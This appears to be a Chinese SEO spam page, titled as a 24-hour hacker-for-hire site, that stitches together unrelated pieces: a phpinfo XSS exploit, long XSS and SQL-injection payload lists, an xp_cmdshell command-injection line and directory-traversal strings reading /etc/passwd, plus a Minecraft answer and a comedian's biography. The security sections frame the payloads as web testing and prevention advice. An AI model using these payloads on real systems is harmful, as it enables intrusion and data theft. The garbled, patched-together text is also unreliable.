黑客24小时在线接单网站

本文目录一览：

• 1、什么是phpinfo xss跨站脚本攻击漏洞?
• 2、哪有放XSS跨站脚本工具的第三方工具/
• 3、如何进行WEB安全性测试
• 4、我的世界什么mod可以让1.7.10有1.8的黏液块啊
• 5、小沈阳的个人资料、小沈阳个人照片、小沈阳作品集
• 6、跨站脚本攻击（XSS）alert(42873)

什么是phpinfo xss跨站脚本攻击漏洞?

php是一款被广泛使用的编程语言，可以被嵌套在html里用做web程序开发。phpinfo()是用来显示当前php环境的一个函数，许多站点和程序都会将phpinfo放在自己的站点上或者在程序里显示，但是phpinfo里存在一些安全问题，导致精心构造数据就可以产生一个跨站脚本漏洞，可以被用来进行攻击。

漏洞成因： phpinfo页面对输入的参数都做了详细的过滤，但是没有对输出的进行charset的指定，而在一些浏览器里如IE7里，你可以让它自动选择编码或者通过一个iframe页面给它指定编码，这样就可以饶过phpinfo的过滤而产生一个跨站脚本漏洞。

漏洞来源:

漏洞利用： 利用代码如下：

html

head

META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"

/head

body

iframe src=";+ADw-/SCRIPT+AD4-=1"

以上代码在IE7+php 5.2.6测试成功。phpinfo页面的xss甚至比其他页面更加危险，因为如果有phpinfo的存在，恶意攻击者可以利用phpinfo的输出bypass如httponly和一些基础认证。

漏洞影响： 影响所有版本的php和浏览器IE7

漏洞修补： 建议暂时删除站点的phpinfo页面避免被人利用。

哪有放XSS跨站脚本工具的第三方工具/

不修改网站程序,使用第三方工具来防范XSS跨站式脚本攻击

网站要怎么防范常见的XSS跨站式脚本攻击呢，我们先从XSS跨站式脚本攻击的原理来说起。

网站遭受XSS跨站式脚本攻击的基本原理

1.本地利用漏洞，这种漏洞存在于页面中客户端脚本自身。

其攻击过程如下所示：

A给B发送一个恶意构造了Web的URL。

B点击并查看了这个URL。

恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。

具有漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。

A的恶意脚本可以在B的电脑上执行B所持有的权限下的命令。

2反射式漏洞，这种漏洞和本地利用漏洞有些类似，不同的是Web客户端使用Server端脚本生成页面为用户提供数据时，如果未经验证的用户数据被包含在页面中而未经HTML实体编码，客户端代码便能够注入到动态页面中。

其攻击过程如下：

A经常浏览某个网站，此网站为B所拥有。B的站点运行A使用用户名/密码进行登录，并存储敏感信息（比如银行帐户信息）。

C发现B的站点包含反射性的XSS漏洞。

C编写一个利用漏洞的URL，并将其冒充为来自B的邮件发送给A。

A在登录到B的站点后，浏览C提供的URL。

嵌入到URL中的恶意脚本在A的浏览器中执行，就像它直接来自B的服务器一样。此脚本盗窃敏感信息（授权、信用卡、帐号信息等）然后在A完全不知情的情况下将这些信息发送到C的Web站点。

3存储式漏洞，该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞，骇客将攻击脚本上传到Web服务器上，使得所有访问该页面的用户都面临信息泄漏的可能，其中也包括了Web服务器的管理员。

其攻击过程如下：

B拥有一个Web站点，该站点允许用户发布信息/浏览已发布的信息。

C注意到B的站点具有存储式的XXS漏洞。

C发布一个热点信息，吸引其它用户纷纷阅读。

B或者是任何的其他人如A浏览该信息，其会话cookies或者其它信息将被C盗走。

类型A直接威胁用户个体，而类型B和存储式漏洞所威胁的对象都是企业级Web应用。

网站遭受XSS跨站式脚本攻击的基本方式

1. DOM-based cross-site scripting

页面本身包含一些DOM对象的操作，如果未对输入的参数进行处理，可能会导致执行恶意脚本。如下面一些DOM操作：

document.URL

document.URLUnencoded

document.location (and many of its properties)

document.referrer

window.location (and many of its properties)

举个例子，假如某个脆弱的页面的代码如下：

HTML

TITLEWelcome!/TITLE

Hi

SCRIPT

var pos=document.URL.indexOf("name=")+5;

document.write(document.URL.substring(pos,document.URL.length));

/SCRIPT

BR

Welcome to our system

…

/HTML

攻击者使用如下的URL访问时，则非常危险：

;scriptalert(document.cookie)/script

试了一下，貌似IE、FireFox等浏览器默认 对scriptalert(document.cookie)/script进行了编码，阻止了脚本的执行。但是对于 DOM操作还是要更加谨慎啊，比如把上面的页面修改一下，安全性就增强了不少：

SCRIPT

var pos=document.URL.indexOf("name=")+5;

var name=document.URL.substring(pos,document.URL.length);

if (name.match(/^[a-zA-Z0-9]$/))

{

document.write(name);

}

else

{

window.alert("Security error");

}

/SCRIPT

2. Reflected cross-site scripting

也被称为None-Persistent cross-site scripting，即，非持久化的XSS攻击，是我们通常所说的，也是最常用，使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL，当 URL地址被打开时，特有的恶意代码参数被HTML解析、执行。它的特点是非持久化，必须用户点击带有特定参数的链接菜能引起。

3. Persistent cross-site scripting

持久化XSS攻击，指的是恶意脚本代码被存储进被攻击的数据库，当其他用户正常浏览网页时，站点从数据库中读取了非法用户存入非法数据，恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。

实施方式

我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX，发现参数XXX原样的出现在了页面源码中：

1. input type="text" class="634b-adfd-073c-2933 Seach" name="w" value="XXX" /

OK，可以开始做文章了，我们将XXX替换为：abc"/scriptalert('haha')/scripta href="，返回的HTML代码如下：

1. input type="text" class="adfd-073c-2933-44fd Seach" name="w" value="abc"/

2. scriptalert('haha')/script!--" /

这样，scriptalert('haha')/script被执行了。这里再举例一些XSS攻击行为：

1. IMG SRC="javascript:alert('XSS');"

2. IMG SRC=javascript:alert('XSS')

3. IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"

4. IMG SRC="jav ascript:alert('XSS');"

5. SCRIPT/XSS SRC=""/SCRIPT

6. SCRIPTalert("XSS");///SCRIPT

7. iframe src=

8. INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"

9. BODY BACKGROUND="javascript:alert('XSS')"

10. BODY ONLOAD=alert(document.cookie)

11. BODY onload!#$%()*~+-_.,:;?@[/|"]^`=alert("XSS")

12. IMG DYNSRC="javascript:alert('XSS')"

13. IMG DYNSRC="javascript:alert('XSS')"

14. BR SIZE="{alert('XSS')}"

15. IMG SRC='vbscript:msgbox("XSS")'

16. TABLE BACKGROUND="javascript:alert('XSS')"

17. DIV STYLE="width: expression(alert('XSS'));"

18. DIV STYLE="background-image: url(javascript:alert('XSS'))"

19. STYLE TYPE="text/javascript"alert('XSS');/STYLE

20. STYLE type="text/css"BODY{background:url("javascript:alert('XSS')")}/STYLE

21. ?='SCRIPTalert("XSS")/SCRIPT'?

22. A HREF="javascript:document.location=''"XSS/A

23. IMG SRC=javascript:alert('XSS')

24. EMBED SRC="" AllowScriptAccess="always"/EMBED

25. a="get";

26. b="URL(""";

27. c="javascript:";

28. d="alert('XSS');"")";

29. eval(a+b+c+d);

总结一下，要防止XSS跨站式脚本攻击主要是要在查询字符串(QueryString)，表单数据（PostData）以及Cookie甚至HTTP报头（Header）中防止掉一些javascript关键字和一些敏感的字符（单引号，分号）以及SQL语言的关键字，以及防止他们使用encode编码。

用ASP或者PHP脚本来实现上面的这些想起来就很麻烦。下面就来介绍下用一个第三方工具IISUTM来处理上面我们说到的问题。

准备工作：先去下载最新的IISUTM版本。

根据IISUTM网站防火墙安装及操作手册 中的说明把IISUTM部署到你的服务器上来，这里需要注意的是使用Windows 2003+iis6的服务器，需要开启iis中“以IIS5.0 隔离模式运行 www 服务”选项才能正常使用该软件。

安装完成，通过浏览器访问IISUTM的配置管理界面默认的是，这个是私有地址，只能在该服务器 *** 问，你需要任何地方都能访问的话，可以在安装的时候IP地址的选项那里填入你服务器的公网IP地址，和你所开放的端口。这样你就可以通过你配置的地址进行访问，或者你可以在iis中直接管理名为IISUTM的站点。

登陆管理界面后点击上面导航栏中的“基本设置”，然后点击左边菜单的“防XSS攻击”链接。

开启该链接里所有的选项，选中之后IISUTM会自动保存配置，下面的“使用不允许的发送序列”是该软件提供的XSS攻击关键字的特征库，你可以根据你网站的情况进行更改（更好不要修改）。

确认以上的配置以后，你可以返回到IISUTM管理界面的首页，这里会列出最近服务器遭受到的攻击以及详细，赶紧去看看你的网站是不是随时有人在进行SQL注入吧，以及哪些攻击被IISUTM处理掉了。

如何进行WEB安全性测试

安全性测试主要从以下方面考虑 主要从以下方面考虑： WEB 的安全性测试主要从以下方面考虑： Injection(SQL 注入) 1.SQL Injection(SQL 注入) (1)如何进行 SQL 注入测试? 首先找到带有参数传递的 URL 页面,如 搜索页面,登录页面,提交评论页面等等. 注 1:对 于未明显标识在 URL 中传递参数的,可以通过查看 HTML 源代码中的 "FORM"标签来辨别是否还有参数传递.在FORM 和/FORM的标签中间的每一个 参数传递都有可能被利用. form id="form_search" action="/search/" method="get" div input type="text" name="q" id="search_q" value="" / input name="search" type="image" src="/media/images/site/search_btn.gif" / a href="/search/" class="073c-2933-44fd-4003 fl"Gamefinder/a /div /form 注 2:当你找不到有输入行为的页面时,可以尝试找一些带有某些参数的特殊的 URL,如 其 次,在 URL 参数或表单中加入某些特殊的 SQL 语句或 SQL 片断,如在登 录页面的 URL 中输入 /INDEX.ASP?USERNAME=HI' OR 1=1-注 1：根据实际情况,SQL 注入请求可以使用以下语句: ' or 1=1- " or 1=1- or 1=1- ' or 'a'='a " or "a"="a ') or ('a'='a 注 2：为什么是 OR， 以及',――是特殊的字符呢？ 例子：在登录时进行身份验证时，通常使用如下语句来进行验证：sql=select * from user where username='username' and pwd='password' 如 输入 ' admin' or 1='1pwd=11，SQL 语句会变成以下：sql=select 11 1='1 username='admin' or 1='1 and password='11 admin' 1='1' 11' 11 * from user where ' 与 admin 前面的'组成了一个查询条件,即 username='admin',接下来的语句将 按下一个查询条件来执行. 接 下来是 OR 查询条件,OR 是一个逻辑运 算符， 在判断多个条件的时候， 只要一 个成立，则等式就成立，后面的 AND 就不再时行判断了，也就是 说我们绕过了密码 验证，我们只用用户名就可以登录. 如 输入 '--pwd=11，SQL 语 admin'-admin'-11 句会 变成以下 sql=select * from user where name='admin' -- and pasword='11', admin' --' 1 '与 admin 前面的'组成了一个查 询条件,即 username='admin',接下来的语句将按 下一个查询条件来执行 接下来是"--"查询条件,“--”是忽略或注释,上 述通过连接符注释掉后面的密码验 证(注:对 ACCESS 数据库 数据库无 效). 最后,验证是否能入侵成功或是出错的信息是否包含关于数据库服务器 的相关信息;如 果 能说明存在 SQL 安 全漏洞. 试想,如果网站存在 SQL 注入的危险,对于有经验的恶意用户还可能猜出数据库表和表结 构,并对数据库表进行增\删\改的操 作,这样造成的后果是非常严重的. (2)如何预防 SQL 注入? 从应用程序的角度来讲,我们要做以下三项工作 工作: 工作 转义敏感字符及字符串(SQL 的敏感字符包括 “exec”,”xp_”,”sp_”,”declare”,”Union”,”cmd”,”+”,”//”,”..”,”;”,”‘”,”--”,”%”,”0x”,”=!-*/()|”, 和”空格”). 屏蔽出错信息：阻止攻击者知道攻击的结果 在服务端正式处理之前提交数据的合法性(合法性检查主要包括三 项:数据类型,数据长度,敏感 字符的校验)进行检查等。最根本的解决手段,在确认客 户端的输入合法之前,服务端拒绝进行关 键性的处理操作. 从测试人员的角度来讲,在程序开发前(即需求阶段),我们就应该有意识的将 安全性检查应用到需求测试中,例如对一个表单需求进行检查时,我们一般检验 以下几项安全性问题: 需求中应说明表单中某一 FIELD 的类型,长度,以及取值范围(主要作用就 是禁止输入敏感字符) 需求中应说明如果超出表单规定的类型,长度,以及取值范围的,应用程序 应给出不包含任何代码或数据库信息的错误提示. 当然在执行测试的过程中,我们也需求对上述两项内容进行测试. 2.Crossscritping(XSS):(跨站点脚本攻击 跨站点脚本攻击) 2.Cross-site scritping(XSS):(跨站点脚本攻击) (1)如何进行 XSS 测试? !--[if !supportLists]--首先,找到带有参数传递的 URL,如 交评论,发表留言 页面等等。 登录页面,搜索页面,提 !--[if !supportLists]--其次,在页面参数中输入如下语句(如:Javascrīpt,VB scrīpt, HTML,ActiveX, Flash)来进行测试： scrīptalert(document.cookie)/scrīpt 注:其它的 XSS 测试语句 scrīptalert(document.cookie)/scrīpt ='scrīptalert(document.cookie)/scrīpt scrīptalert(document.cookie)/scrīpt scrīptalert(vulnerable)/scrīpt %3Cscrīpt%3Ealert('XSS')%3C/scrīpt%3E scrīptalert('XSS')/scrīpt img src="javascrīpt:alert('XSS')" %0a%0ascrīptalert(\"Vulnerable\")/scrīpt.jsp %22%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %3c/title%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e/index.html %3f.jsp %3f.jsp scrīptalert('Vulnerable');/scrīptgt scrīptalert('Vulnerable')/scrīpt ?sql_debug=1 a%5c.aspx a.jsp/scrīptalert('Vulnerable')/scrīpt a/ a?scrīptalert('Vulnerable')/scrīpt "scrīptalert('Vulnerable')/scrīpt ';exec%20master..xp_cmdshell%20'dir%20 c:%20%20c:\inetpub\wwwroot\?.txt'-- %22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E %3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E %3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3ESESSION_ID={SESSION_ID}SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= ../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini '';!--"XSS={()} IMG SRC="javascrīpt:alert('XSS');" IMG SRC=javascrīpt:alert('XSS') IMG SRC=javascrīpt:alert('XSS') IMG SRC=javascrīpt:alert("XSS") IMG SRC=javascrīpt:alert('XSS') IMG SRC=javascrīpt:alert('XSS') IMG SRC="jav ascrīpt:alert('XSS');" IMG SRC="jav ascrīpt:alert('XSS');" IMG SRC="jav ascrīpt:alert('XSS');" "IMG SRC=java\0scrīpt:alert(\"XSS\")";' out IMG SRC=" javascrīpt:alert('XSS');" scrīpta=/XSS/alert(a.source)/scrīpt BODY BACKGROUND="javascrīpt:alert('XSS')" BODY ōNLOAD=alert('XSS') IMG DYNSRC="javascrīpt:alert('XSS')" IMG LOWSRC="javascrīpt:alert('XSS')" BGSOUND SRC="javascrīpt:alert('XSS');" br size="{alert('XSS')}" LAYER SRC=""/layer LINK REL="stylesheet" HREF="javascrīpt:alert('XSS');" IMG SRC='vbscrīpt:msgbox("XSS")' IMG SRC="mocha:[code]" IMG SRC="livescrīpt:[code]" META HTTP-EQUIV="refresh" CONTENT="0;url=javascrīpt:alert('XSS');" IFRAME SRC=javascrīpt:alert('XSS')/IFRAME FRAMESETFRAME SRC=javascrīpt:alert('XSS')/FRAME/FRAMESET TABLE BACKGROUND="javascrīpt:alert('XSS')" DIV STYLE="background-image: url(javascrīpt:alert('XSS'))" DIV STYLE="behaviour: url('');" DIV STYLE="width: expression(alert('XSS'));" IMG SRC=javascript:ale STYLE@im\port'\ja\vasc\ript:alert("XSS")';/STYLE IMG STYLE='xss:expre\ssion(alert("XSS"))' STYLE TYPE="text/javascrīpt"alert('XSS');/STYLE STYLE type="text/css"BODY{background:url("javascrīpt:alert('XSS')")}/STYLE BASE HREF="javascrīpt:alert('XSS');//" getURL("javascrīpt:alert('XSS')") a="get";b="URL";c="javascrīpt:";d="alert('XSS');";eval(a+b+c+d); XML SRC="javascrīpt:alert('XSS');" " BODY ōNLOAD="a();"scrīptfunction a(){alert('XSS');}/scrīpt" scrīpt SRC="/Article/UploadFiles/200608/20060827171609376.jpg"/scrīpt IMG SRC="javascrīpt:alert('XSS')" IMG SRC="" scrīpt a="" SRC=""/scrīpt scrīpt ="" SRC=""/scrīpt scrīpt a="" '' SRC=""/scrīpt scrīpt "a=''" SRC=""/scrīpt scrīptdocument.write("SCRI");/scrīptPT SRC=""/scrīpt A HREF=;link/A STYLE TYPE="text/css".XSS{background-image:url("javascrīpt:alert('XSS')");}/STYLEA CLASS=XSS !--#exec cmd="/bin/echo 'scrīpt SRC'"--!--#exec cmd="/bin/echo '=;/scrīp 最后,当用户浏览 时便会弹出一个警告框，内容显示的是浏览者当前的 cookie 串,这就 说明该网站存在 XSS 漏洞。 试想如果我们注入的不是以上这个简单的测试代码，而是一段经常精心设计的恶意脚 本，当用户浏览此帖时，cookie 信息就可能成功的被 攻击者获取。此时浏览者的帐号 就很容易被攻击者掌控了。 (2)如何预防 XSS 漏洞? 从应用程序的角度来讲,要进行以下几项预防: 对 Javascrīpt,VB scrīpt, HTML,ActiveX, Flash 等 语句或脚本进行转义. 在 服务端正式处理之前提交数据的合法性(合法性检查主要包括三项:数据类型,数据长度,敏感 字符的校验)进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端 拒绝进行关 键性的处理操作. 从测试人员的角度来讲,要从需求检查和执行测试过程两个阶段来完成 XSS 检查: 在需求检查过程中对各输入项或输出项进行类型、长度以及取 值范围进 行验证，着重验证是否对 HTML 或脚本代码进行了转义。 执行测试过程中也应对上述项进行检查。 3.CSRF:(跨站点伪造请求) 3.CSRF:(跨站点伪造请求) CSRF:(跨站点伪造请求 CSRF 尽管听起来像跨站脚本（XSS），但它与 XSS 非常不同，并且攻击方式 几乎相左。 XSS 是利用站点内的信任用户，而 CSRF 则通过伪装来自受信任用户的请求 来利用受信任的网站。 XSS 也好， CSRF 也好， 它的目的在于窃取用户的信息， SESSION 和 COOKIES 如 （关于 SESSION 和 COOKIES 的介绍请参见我的另一篇 BLOG： ）， (1)如何进行 CSRF 测试？ 关于这个主题本人也正在研究，目前主要通过安全性测试工具来进行检查。 (2)如何预防 CSRF 漏洞？ 请参见 请 参见 avoid_exposing_your_gmail_contacts.html Injection(邮件标头注入 邮件标头注入) 4.Email Header Injection(邮件标头注入) Email Header Injection：如果表单用于发送 email,表单中可能包括 “subject”输入项（邮件标题），我们要验证 subject 中应能 escape 掉“\n” 标识。 !--[if !supportLists]--!--[endif]--因为“\n”是新行，如果在 subject 中输入“hello\ncc:spamvictim@example.com”，可能会形成以 下 Subject: hello cc: spamvictim@example.com !--[if !supportLists]--!--[endif]--如果允许用户使用这样的 其它用 subject， 那他可能会给利用这个缺陷通过我们的平台给其它 户发送垃 其它 圾邮件。 Traversal(目录遍历 目录遍历) 5.Directory Traversal(目录遍历) （1）如何进行目录遍历测试？ 目录遍历产生的原因是：程序中没有过滤用户输入的“../”和“./”之 类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的 任意文件。 测试 *** ： URL 中输入一定数量的 在 “../” “./” 验证系统是否 ESCAPE 和 ， 掉了这些目录跳转符。 （2）如何预防目录遍历？ 限制 Web 应用在服务器上的运行 进 行严格的输入验证，控制用户输入非法路径 messages(错误信息 错误信息) 6.exposed error messages(错误信息) （1）如何进行测试？ 首 先找到一些错误页面，比如 404,或 500 页面。 验证在调试未开通过的情况下， 是否给出了友好的错误提示信息比如“你 访问的页面不存 在”等，而并非曝露一些程序代码。 （2）如何预防？ 测试人员在进行需求检查时，应该对出错信息 进行详细查，比如是否给 出了出错信息，是否给出了正确的出错信息。

我的世界什么mod可以让1.7.10有1.8的黏液块啊

不能,大多数的mod都是对应版本的,所以一般的玩家如果有安装mod的话都不会轻易变换版本,不然又要重新下载mod,很麻烦,所以,下载mod要谨慎!

小沈阳的个人资料、小沈阳个人照片、小沈阳作品集

[编辑本段]个人信息

艺名：小沈阳

原名：沈鹤

曾用名：沈阳

花名：阳仔

英文名：XIAO Shenyang（小损样儿）

性别：男

出生年月：1981年5月7日(阴历四月初四)

星座：金牛座

年龄：28岁

生肖：鸡

籍贯：辽宁省 铁岭市 开原市

妻子和子女：沈春阳（即小沈阳的搭档，25岁）有一女儿（4岁）

身高：174cm左右

体重：约60公斤

职业：艺术家/演员

血型：AB型

毕业学校：辽宁省开原市上肥地乡代庄小学

人生格言：走别人的路,让别人无路可走

座右铭：

不要只想要，付出不能少。 不要急着要，一定要戒躁。

不要求回报，该到自然到。 不要急得到，心静便无恼。

说话要想好，办事要公道。 说到要做到，不要瞎编造。

做人要地道，才能步步高。 走就走正道，好人有好报。

体型：很好

性格：浪漫迷人、成熟稳重、风趣幽默、活泼可爱、开朗大方、感情专一、善解人意、诚实坦白

口头禅：为什么呢? 啪啪的！……hang~ 哎呀我的妈呀

偶像：成吉思汗

喜欢的活动：民间艺术、唱K、看电影、游戏对战

喜欢的食物：素食

喜欢的歌星：孙楠 刀郎 （“赵铁柱”他爹（赵本山 饰）称为“屎壳郎”）许巍

喜欢的电影：冯小刚拍摄的电影

个人介绍：山不转水转，水不转人转，风风火火二人转，转不出的缘里缘外，转不完的缘系缘牵，我就是“为戏痴迷 为歌疯狂”小沈阳是也。

师父：赵本山

所从事的行业：影视/娱乐/体育

嗜好：吸烟、喝酒

[编辑本段]生平简介

小沈阳，深受广大二人转爱好者的欢迎。

他男扮女装的另类二人转表演在刘老根大舞台引起了不小的轰动。

沈鹤出生于开原市一个贫苦的农民家庭，艰苦的家庭条件并没有阻挡他对艺术的向往，反而成为了他受益终身的财富。上学期间他就积极参加学校、县里组织的各项文艺活动，老师常表扬有超众的艺术天分。

高中毕业以后，进入铁岭县艺术团学习二人转表演。老师系统的教导、良好的艺术天赋再加上自身的不断努力为他的演艺生涯打下了坚实的基础。在铁岭县艺术团期间，他积极地参加下乡演出，在田间地头与观众面对面的交流使他深刻地感受到老百姓对二人转的喜爱，也更加坚定了他将二人转艺术作为一生的追求。

2000年他进入吉林林越艺术团，扎实的基本功、诙谐的表演方式使其深受观众的欢迎和好评，观众的认可无疑是他更大的动力，促使他以更高的艺术标准来要求自己。2001年，参加之一届“本山杯”二人转大赛获得了铜奖，对于一个学习二人转只有4年的新人来说，这个奖项是对他多年来的付出的一个肯定。

19岁时和老婆沈春阳恋爱，当时把自己的经济交给夫人管理，虽然钱包里每次不超过100，一次演出的出场费也才40、50元。但是对于老婆的爱一尘不变。

2006年阴历八月十五，他正式成为赵本山的弟子，开始系统的学习二人转。通过老师的悉心指导工作和自身的刻苦努力，在艺术的道路上有了质的飞跃，辽宁民间艺术团的广阔平台也给了他充分展示自己的机会。

他在以“刘老根大舞台”为基地的舞台上辛勤耕耘，为弘扬绿色二人转贡献出了自己的力量。 在2008年春节晚会筹备期间，就有小沈阳登台演出的消息广泛传播。虽然当年没有登上08春晚舞台，但 *** 上小沈阳演出视频非常火爆。在《乡村爱情》1、2中也有角色扮演，深受大家喜欢。

随后在2009年中央电视台春节联欢晚会中与师傅赵本山搭档演出小品后，受到更多人的喜爱。

[编辑本段]拜师经历

小沈阳在哈尔滨唱二人转那会儿，就跟现在的师兄弟都认识了，他们经常跟赵本山提起小沈阳，说他唱得不错。2006年5月的一个夜里，小沈阳接到一个 *** ，那人一直不出声，就是呵呵地在 *** 里笑。小沈阳有点不敢相信，冒昧问“哎呀妈呀，难道是赵老师？”对方一句“怎么地？”小沈阳蒙了，激动得有些“麻爪”。当时赵老师说，“听说你唱得挺好，就来沈阳发展吧！”。

可拜师也不那么容易，赵本山亲自在当时的铁西和平影剧院给小沈阳考试。考试通过后，2006年的中秋节，小沈阳正式拜师，拜师时，师父跟小沈阳说的唯一的一句话就是，“好好干，犯错误收拾你”。

[编辑本段]电视剧作品

《乡村爱情Ⅱ》扮演齐三太镇长夫人的侄子王天来。

《关东大先生》中扮演“小奉天”。

[编辑本段]从艺经历

2009春晚小品《不差钱》小沈阳剧照1995年至1998年在铁岭学习二人转表演

1999年正式演出

2000年参加首届本山杯二人转大赛 获铜奖

2006年参加刘老根大舞台二人转大赛 获季冠军

2006年阴历八月十五被赵本山收为徒弟，他男扮女装的另类二人转表演在刘老根大舞台引起了不小的轰动。

2007年12月初次登陆央视舞台，在电视剧群英汇晚会中表演了《我要当明星》片段，获得满堂彩。

2008年1月有机会参加央视春晚的审查，送选节目《我要当明星》，惟妙惟肖地模仿了刀郎、刘德华、张雨生、阿杜、阿宝的演唱，震惊四座。最终被评价为与春晚主题不够相符未能与全国人民在大年夜开心笑一回。

2008年2月20日再次应央视春晚导演邀请参加元宵晚会的录制，表演《我要当明星》，再次震惊四座，但在2月21日正式播放时因节目时间过长未播出。

2009年1月24日终于参选春节联欢晚会，和老师赵本山同台表演小品《不差钱》，获得全国观众高声叫好，从而一炮走红，身价从2006年的500元瞬间飙升至30—50万元。

2009年1月25日参加北京电视台春节联欢晚会，表演小品《超级大明星》，表演的惟妙惟肖。小沈阳北京春晚

[编辑本段]小沈阳作品 ***

搞笑类：

“烤肉串”＋早期作品大全：

北票演出：

中国足球：

东方斯卡拉：

大话西游：

公安部慰问演出：

刘老根大舞台：

刘老根大舞台冠军：

天津电视台：

元宵未播出：

笑动2008 ：

参加春晚审查：

辽宁台小品求婚：

搞笑秀：

笑话上坟：

和四舅妈：

笑在新春：

不差钱：;ct=301989888rn=20pn=0db=0s=0ty=10

唱歌类：

把泪擦干：

回家真好：

囚歌：

小沈阳练习：

模仿刀郎：

模仿张宇：

模仿冰雨：

后台排练：

春晚彩排：

搞笑唱歌：

千里之外：

访谈类：

小沈阳给天健网友拜年：

元宵被毙：

辽宁晚报采访：

唱二人转被哄下场：

春晚“被毙”感受：

谈赵本山收徒标准：

赞东北：

星播客拜年：

正戏类：

闪闪的红星：

正戏：

小帽《双回门》：

江南寡妇：

刘三姐上寿：

包公铡侄：

汉琦杀庙：

包公断太公：

电视剧类：

乡村爱情2小沈阳演出片段集锦：

乡村爱情2（完整版41集全）：

乡村爱情2首映演唱：

其他类:

电子相册: 1、分解板：地址：

2、完整版＋动画版：

3、至尊玉动画版：

4、小沈阳 *** (完整版＋漫画版)：mp4

小沈阳“五一乐翻天”电子相册：

个人博客

小沈阳官方网站 沈采飞阳（歌迷网）

网友原创小沈阳搞笑 *** 表情系列

[编辑本段]经典台词

1 这是为什么呢

2 走别人的路，让别人无路可走

3 我太有才了，上辈子我是裁缝

4 都说我长得寒碜，不过我妈挺稀罕我，我妈说小时候带我去公园，老多人围着问我妈， “大姐，你家这猴搁哪买的？” 现在我都长开了。

5 出名了仍要慢慢发展看看我穿的这身衣服，啥，你说我这大红配大绿不好看，别瞧不起人，我的衣服都是从专卖店买的。

6 我在商场逛，随便问一个服务员，你卖这衣服多少钱？她说，180元。我说，30元卖不？她说卖，然后就让我交钱，我说，我不买，就是随便溜达。

7 太阳出来东方亮，山炮啥样我啥样

8 多喜庆啊

9 ——我看你长得好年轻哦 这化妆品好厉害哦 眼瞅着都六十的人了 谁能看出来了

——谁六十啊 人家一朵花没开呢

——是啊 仙人掌嘛 六十年一开嘛

10 pia pia 我就溜达，我可顽皮了呢!!

11 眼睛一闭一睁一天儿过去了hou~,眼睛一闭不睁,一辈子过去了hou!

12 我到家了，你们还追啊!!

13 不用拍,到我的班就是休息!

14 我看谁没鼓掌，半夜趴你家窗户~~

15 我的中文名叫小沈阳,我的英文名叫xiao shen yang ~~~~~!

16 老妹儿,你能抓着我啊~~

17 咿，这一着急穿跑偏了,哎呀妈呀，我说走道咋没有裆nia。

18 我是有身份的人,什么是有身份的人呢?就是有身份证的人就是有身份的人!

19 太阳出来照大地！欢迎大伙来看戏

20 诶呀妈呀，我可稀罕我这个小包了。320……打完折15

21 我自己能做到的事，从来不麻烦别人

22 我走死你~~~~

23 观众朋友们吖~~他们都说我长地像变态~！告诉你们，其实我可正常咧~！！！！

24 放你个五彩玲珑月光电缆屁！

25 趴趴地就溜达，谁叫我也不回头。

26 到我班儿了嚎，大伙儿不用老鼓掌.你们的手腕子一疼.我的心都疼.

27 你瞎啊!!!我这是棉花套只!!!!

28 哎呀我说别人跑你不跑是吧...你藐视我是吧！ 我说你咋不蹽呐~~我来啦....

29 来哥啊？我小唐，恩那~到女儿国了~老狠了~扇嘴巴子，pia pia的!

30 人不可貌相`海水不可瓢崴

31 给朋友们来个另类点的 台湾著名歌星 *** 的歌送给大家

美国著名摇滚电视剧连续剧水浒传的主题歌护花使者的片头曲刀郎的情人献给大家

32 朋友们呐.他们都说柞瞅我长的磕碜.其实我一点也不磕碜.不信你细瞅.......还赶不上柞瞅呢哈

33 我不是名人 就是一人名

34 这跟头 我练七八年~

35 -玉帝哥哥

-爱 八戒

-玉帝哥哥你是从哪里来啊！

-伊拉克！

-太他妈远了吧~

-远了，那平房！

-没打着 没打着 你妈 *** 长白毛！

-我要的是真经

- *** 我这也不是水货啊！

36 就那伊拉克 你说国家都快黄了

37 -你瞅你长这么难看还出来溜达，在家呆着呗

-就光看你 都撞树上了

38 感谢你们鸦雀无声~

39 我虽然不是名人朋友们，但是像我们周边这些国家，像马来西亚、泰国、越南、新加坡，还有俄罗斯哈----------------我都没去过~

40 别看我长得变态 其实我老有才了

41 这种感觉就是上气不接下气 ...啊吗...上就要短气

42 阿姨阿姨夫你们好~

43（模仿阿杜）你听见了么？ 呃~我还没唱呢~

44 老妹你别害怕 我是人 不是鬼阿~

45 呸 臭不要脸的~

46 我给你讲我就穿我这身休闲~

47 你说我是男是女袄 这个问题给我也整矛盾了~

48 奶奶 你真不去袄 那太好了 ~

49 奶奶 我不是玩意

50 哥，你回来了？sit down please!

51太阳出来照大地！欢迎大伙来看戏！要问我是哪一个，人送外号小巩俐！

52 矿泉水喽~茶蛋香肠烤鱼片儿喽~

53 小沈阳说他做飞机空姐就这么喊

54 就是，有一种大海地感觉呢。。。

55 亩嘛呀（这个读法读起来真像，感谢发明者），吃饭还能伤银呐？

56 Q7地，开不起我还背不起么！

57 你咋害不撩尼？你藐视我是不？我来了。。。

58 姐，姐你猜我这小包夺钱你猜，320你信不，打完则15，嗯，老便宜了。

59 哥啊 你就是我亲爹

